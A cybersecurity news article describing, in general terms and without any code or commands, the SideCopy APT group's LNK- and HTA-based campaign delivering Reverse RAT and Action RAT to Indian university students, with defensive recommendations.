Indian universities targeted by the SideCopy APT group

The notorious SideCopy APT group currently has an ongoing cybercriminal operation that exclusively targets various academic institutions in India.

According to reports, the group’s campaign has targeted university students since May last year with sophisticated infection chains that use LNK files, HTAs, and loader DLLs posing as legitimate files.

Moreover, researchers revealed that they spotted this threat group targeting South Asian countries, primarily Afghanistan and India’s government and military sectors. However, the group transitioned its focus to Indian universities, using malware payloads like Reverse RAT and Action RAT to acquire complete control over affected computers.

The investigation also studies the group’s techniques, including their recent focus on university students and potential similarity with the Transparent Tribe APT group.

 

The SideCopy APT group uses malicious domains that would allow them to execute their campaigns.

 

The SideCopy APT group leverages a malicious domain throughout their operations. Researchers explained that the group’s website hosts a ZIP archive file named “files.zip” with subdirectories labelled “economy,” “it,” and “survey.” In addition, the survey directory included files similar to the techniques used by the group for their previous campaigns.

SideCopy’s campaign most likely uses spam emails to distribute the malicious ZIP package it stores on its hijacked website, which serves as the initial infection vector. These archives include malicious LNK files disguised as legitimate papers, such as “IT Trends.docx.lnk.”

Subsequently, these attackers use these LNK files to run commands that download and execute a malicious HTA file. The actors use these downloaded HTA files as payloads, which are attached to additional lure documents and DLL files. Hence, the lure materials are usually themed around current events or relevant academic themes to appear credible to the target population.

The malware authors also designed the payload to adapt to the presence of various AV solutions, such as Avast, Kaspersky, and Bitdefender. Storing the LNK shortcut files in the startup folder increases its ability to bypass detection and ensure the establishment of its persistence.

The attack method eventually results in malicious payloads such as Reverse RAT and Action RAT being deployed on the victim system, which then connects to a C2 server to initiate the threat actors’ malicious capabilities.

Experts urge Indian entities, especially academic institutions, to use competent email filtering systems, exercise caution, deploy network-level monitoring, and deactivate scripting languages such as PowerShell, MSHTA, and cmd.exe to mitigate this potential threat.